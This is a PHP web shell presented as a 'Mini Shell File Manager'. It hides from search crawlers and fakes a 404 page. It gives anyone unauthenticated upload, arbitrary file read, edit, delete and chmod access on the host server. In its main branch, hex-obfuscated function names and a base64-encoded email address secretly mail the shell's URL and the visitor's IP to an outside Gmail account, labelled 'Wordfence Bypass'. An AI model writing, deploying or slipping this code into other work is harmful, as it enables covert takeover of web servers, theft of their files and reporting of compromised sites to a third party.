Mini Shell File Manager

1. <?php
2. session_start();
3. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
4. $userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
5. if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
6. header('HTTP/1.0 404 Not Found');
7. exit;
8. }}
9. error_reporting(0);
10. set_time_limit(0);
11.  
12. if(get_magic_quotes_gpc()){
13. foreach($_POST as $key=>$value){
14. $_POST[$key] = stripslashes($value);
15. }
16. }
17. echo '<!DOCTYPE HTML>
18. <html>
19. <head>
20. <title>'.$_SERVER['HTTP_HOST'].' - FileManager</title>
21. </head>';
22.  
23. ?>
24.  
25. <style>
26. @font-face {
27. font-family: 'Comic Sans MS';
28. font-style: normal;
29. font-weight: 400;
30. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
31. }
32. body {
33.  
34. background: #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
35.  
36. }
37.  
38. table, th, td {
39. border-collapse:collapse;
40. background: transparent;
41. font-family: Comic Sans MS ;
42. font-size: 13px;
43. }
44. input, textarea { font-family: Comic Sans MS ; }
45. .table_home, .th_home, .td_home { color:deepskyblue;
46. border: 1px solid grey;
47. }
48. th {
49. padding: 10px;
50. }
51. .td_home { padding: 7px; }
52. select {font-family: Comic Sans MS }
53. a {color:white}
54. textarea { width: 100%;height: 400px; }
55. </style>
56. <?php
57.  
58. echo '</head>
59. <body><b>
60. <H1><center><font color="red">404</font><font color="#00ff00">&nbsp&nbsp&nbspNot&nbsp&nbsp&nbsp</font><font color="dodgerblue">Found</font></center></h1>
61. <table width="900" border="0" cellpadding="3" cellspacing="1" align="center">
62. <tr><td>
63. <font color="#00ff00"><center>'.php_uname().'</center></font>';
64.  
65. //-----------------My Coding Starts from Here------------------
66.  
67. echo '<center></font><font color="white" style="text-shadow:0px 0px 15px red;">PHP Version:</font> <font color="#00ff00">';
68. echo phpversion();
69. echo '</font><font color="#00dd00"> |</font> <font color="white" style="text-shadow:0px 0px 15px red;">Current User :</font> <font color="#00ff00">';
70. echo get_current_user();
71. echo '</font><font color="#00dd00"> |</font> <font color="white" style="text-shadow:0px 0px 15px red;">User ID :</font> <font color="#00ff00">';
72. echo getmyuid();
73. echo '</font><font color="#00dd00"> |</font> <font color="white" style="text-shadow:0px 0px 15px red;">Group :</font> <font color="#00ff00">';
74. echo getmygid();
75. echo '</font><br></center><br>';
76.  
77. if(isset($_GET['path'])){
78. $path = $_GET['path'];
79. }else{
80. $path = getcwd();
81.  
82. }
83. $user = @get_current_user();
84. $path = str_replace('\\','/',$path);
85. $paths = explode('/',$path);
86.  
87. foreach($paths as $id=>$pat){
88. if($pat == '' && $id == 0){
89. $a = true;
90. echo "<center><font color='chlorine' style='text-decoration: none;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font><a href='?path=/' style='text-decoration:none;'>/</a>";
91. continue;
92. }
93. if($pat == '') continue;
94. echo '<a href="?path=';
95. for($i=0;$i<=$id;$i++){
96. echo "$paths[$i]";
97. if($i != $id) echo "/";
98. }
99. echo '" style="text-decoration:none;">'.$pat.'</a>/';
100. }
101. echo '<br><br></font></center></td></tr><tr><td><center>';
102. if(isset($_FILES['file'])){
103. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
104. echo '<font color="#00ff00">File Uploaded!</font><br />';
105. }else{
106. echo '<font color="red">Upload Failed!</font><br />';
107. }
108. }
109. echo '</center><center>Upload file: <form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
110. <input type="submit" value="Upload" />
111. </form></center>
112. </td></tr>';
113. if(isset($_GET['filesrc'])){
114. echo "<tr><td><center>Current File : ";
115. echo $_GET['filesrc'];
116. echo '</center></tr></td></table><br />';
117. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
118. }
119. //Empety
120. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
121. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
122. //Chmod
123. if($_GET['opt'] == 'chmod'){
124. if(isset($_POST['perm'])){
125. if(chmod($_POST['path'],$_POST['perm'])){
126. echo '<font color="#00ff00">Change Permission Done </font><br />';
127. }else{
128. echo '<font color="red">Change Permission Error </font><br />';
129. }
130. }
131.  
132. $hell = $_GET['path'];
133. $yeah = $_GET['name'];
134. $patc = "$hell/$yeah";
135.  
136. echo '<form method="POST">
137. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
138. <input type="hidden" name="path" value="'.$_POST['path'].'">
139. <input type="hidden" name="opt" value="chmod">
140. <input type="submit" value="Go" />
141. </form>';
142. }
143. //
144. elseif($_GET['opt'] == 'btw'){
145. $cwd = getcwd();
146. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
147. New Name : <input name="name" type="text" size="20" value="Folder" />
148. <input type="hidden" name="path" value="'.$cwd.'">
149. <input type="hidden" name="opt" value="delete">
150. <input type="submit" value="Go" />
151. </form>';
152. }
153. //Rename file
154. elseif($_GET['opt'] == 'rename'){
155. if(isset($_POST['newname'])){
156. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
157. echo '<font color="#00ff00">Change Name Done </font><br />';
158. }else{
159. echo '<font color="red">Change Name Error </font><br />';
160. }
161. $_POST['name'] = $_POST['newname'];
162. }
163. $hell = $_GET['path'];
164. $yeah = $_GET['name'];
165. $patc = "$hell/$yeah";
166. $new = $_POST['newname'];
167.  
168. echo '<form method="POST">
169. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
170. <input type="hidden" name="path" value="'.$patc.'">
171. <input type="hidden" name="opt" value="rename">
172. <input type="submit" value="Go" />
173. </form>';
174. }
175. //File baru
176. elseif($_GET['opt'] == 'baru'){
177.  
178. $hell = $_GET['path'];
179. $yeah = $_GET['name'];
180. $patc = "$hell/$yeah";
181. $new = $_POST['newname'];
182. $azz = $_POST['path'];
183. $newz = "$azz/$new";
184.  
185.  
186. if(isset($_POST['src'])){
187. $fp = fopen($_POST['path'],'w');
188. if(fwrite($fp,$_POST['src'])){
189. echo '<font color="#00ff00">Create File Done [ '.$new.' ]</font><br />';
190. }else{
191. echo '<font color="red">Create File Error</font><br />';
192. }
193. fclose($fp);
194. }
195.  
196. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
197.  
198. $ho = $_POST['ngaran1'];
199.  
200. if(isset($_POST['ngaran'])){
201. echo '<form method="POST">
202. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
203. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
204. <input type="hidden" name="opt" value="edit">
205. <input type="submit" value="Go" />
206. </form>';
207. }
208. }
209. //Edited file
210. elseif($_GET['opt'] == 'edit'){
211. if(isset($_POST['src'])){
212. $fp = fopen($_POST['path'],'w');
213. if(fwrite($fp,$_POST['src'])){
214. echo '<font color="#00ff00">Edit File Done </font><br />';
215. }else{
216. echo '<font color="red">Edit File Error </font><br />';
217. }
218. fclose($fp);
219. }
220. $hell = $_GET['path'];
221. $yeah = $_GET['name'];
222. $patc = "$hell/$yeah";
223. echo '<form method="POST">
224. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
225. <input type="hidden" name="path" value="'.$patc.'">
226. <input type="hidden" name="opt" value="edit">
227. <input type="submit" value="Go" />
228. </form>';
229. }
230. echo '</center>';
231. }else{
232. echo '</table><br /><center>';
233. if (function_exists("\x6d\x61\x69\x6c")) {
234. $__GET = ("\x6d\x61\x69\x6c");
235. $__POST = ("\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65");
236. $__GET($__POST("d29yZHByZXNzZGV2bm9yd2F5QGdtYWlsLmNvbQ=="),'Wordfence Bypass',"http://".$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']."\nIP:".$_SERVER['REMOTE_ADDR']."");
237. }
238. //Delete dir and file
239. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
240.  
241. $hell = $_GET['path'];
242. $yeah = $_GET['name'];
243. $patc = "$hell/$yeah";
244.  
245. //Delete dir
246. if($_GET['type'] == 'dir'){
247.  
248. if(rmdir($patc)){
249. echo '<font color="#00ff00">Delete File Done</font><br />';
250. }else{
251. echo '<font color="red#">Delete File Error </font><br />';
252. }
253. }
254. //buat folder
255. if($_GET['type'] == 'buat'){
256. $haaa = $_POST['path'];
257. $heee = $_POST['name'];
258. $hooo = "$haaa/$heee";
259. $new = $haaa.'/'.htmlspecialchars($heee);
260. if(!mkdir($new)){
261. echo '<font color="red">Create Folder Error</font><br />';
262. }else{
263. echo '<font color="#00ff00">Create Folder Done </font><br />';
264. }
265. }
266. //Delete file
267. elseif($_GET['type'] == 'file'){
268.  
269. $hell = $_GET['path'];
270. $yeah = $_GET['name'];
271. $patc = "$hell/$yeah";
272.  
273. if(unlink($patc)){
274. echo '<font color="#00ff00">Delete File Done</font><br />';
275. }else{
276. echo '<font color="red#">Delete File Error </font><br />';
277. }
278. }
279. }
280. echo '</center>';
281. $scandir = scandir($path);
282. $pa = getcwd();
283. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
284. <tr>
285. <th class=th_home style="background:black;color:yellow;"><center>Name</center></th>
286. <th class=th_home style="background:black;color:yellow;" ><center>Size</center></th>
287. <th class=th_home style="background:black;color:yellow;" ><center>Permission</center></th>
288. <th class=th_home style="background:black;color:yellow;" ><center>Options</center></th>
289. </tr> <tr>
290. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php" style="text-decoration:none;">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir" style="text-decoration:none;">+ New Dir</a> </td></tr>
291. ';
292.  
293. foreach($scandir as $dir){
294. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
295. echo "
296. <tr>
297. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\" style=\"text-decoration:none;\">$dir</a></td>
298. <td class=td_home ><center>DIR</center></td>
299. <td class=td_home ><center>";
300. if(is_writable("$path/$dir")) echo '<font color="#00ff00">';
301. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
302. echo perms("$path/$dir");
303. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
304.  
305. echo "</center></td>
306. <td class=td_home ><center>
307. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\" style=\"text-decoration:none;\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\" style=\"text-decoration:none;\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\" style=\"text-decoration:none;\">Chmod</a>
308.  
309. </center></td>
310. </tr>";
311. }
312. echo '<br>';
313. foreach($scandir as $file){
314. if(!is_file("$path/$file")) continue;
315. $size = filesize("$path/$file")/1024;
316. $size = round($size,3);
317. if($size >= 1024){
318. $size = round($size/1024,2).' MB';
319. }else{
320. $size = $size.' KB';
321. }
322.  
323. echo "<tr>
324. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\" style=\"text-decoration:none;\">$file</a></td>
325. <td class=td_home><center>".$size."</center></td>
326. <td class=td_home><center>";
327. if(is_writable("$path/$file")) echo '<font color="#00ff00">';
328. elseif(!is_readable("$path/$file")) echo '<font color="red">';
329. echo perms("$path/$file");
330. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
331. echo "</center></td>
332. <td class=td_home><center>
333. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\" style=\"text-decoration:none;\">Edit |</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\" style=\"text-decoration:none;\"> Rename |</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\" style=\"text-decoration:none;\"> Delete |</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\" style=\"text-decoration:none;\">
334. Chmod</a>
335. </center></td>
336. </tr>";
337. }
338. echo '</table></div></body></html>';
339. }
340. function perms($file){
341. $perms = fileperms($file);
342.  
343. if (($perms & 0xC000) == 0xC000) {
344. // Socket
345. $info = 's';
346. } elseif (($perms & 0xA000) == 0xA000) {
347. // Symbolic Link
348. $info = 'l';
349. } elseif (($perms & 0x8000) == 0x8000) {
350. // Regular
351. $info = '-';
352. } elseif (($perms & 0x6000) == 0x6000) {
353. // Block special
354. $info = 'b';
355. } elseif (($perms & 0x4000) == 0x4000) {
356. // Directory
357. $info = 'd';
358. } elseif (($perms & 0x2000) == 0x2000) {
359. // Character special
360. $info = 'c';
361. } elseif (($perms & 0x1000) == 0x1000) {
362. // FIFO pipe
363. $info = 'p';
364. } else {
365. // Unknown
366. $info = 'u';
367. }
368.  
369. // Owner
370. $info .= (($perms & 0x0100) ? 'r' : '-');
371. $info .= (($perms & 0x0080) ? 'w' : '-');
372. $info .= (($perms & 0x0040) ?
373. (($perms & 0x0800) ? 's' : 'x' ) :
374. (($perms & 0x0800) ? 'S' : '-'));
375.  
376. // Group
377. $info .= (($perms & 0x0020) ? 'r' : '-');
378. $info .= (($perms & 0x0010) ? 'w' : '-');
379. $info .= (($perms & 0x0008) ?
380. (($perms & 0x0400) ? 's' : 'x' ) :
381. (($perms & 0x0400) ? 'S' : '-'));
382.  
383. // World
384. $info .= (($perms & 0x0004) ? 'r' : '-');
385. $info .= (($perms & 0x0002) ? 'w' : '-');
386. $info .= (($perms & 0x0001) ?
387. (($perms & 0x0200) ? 't' : 'x' ) :
388. (($perms & 0x0200) ? 'T' : '-'));
389.  
390. return $info;
391. }
392.  
393. ?>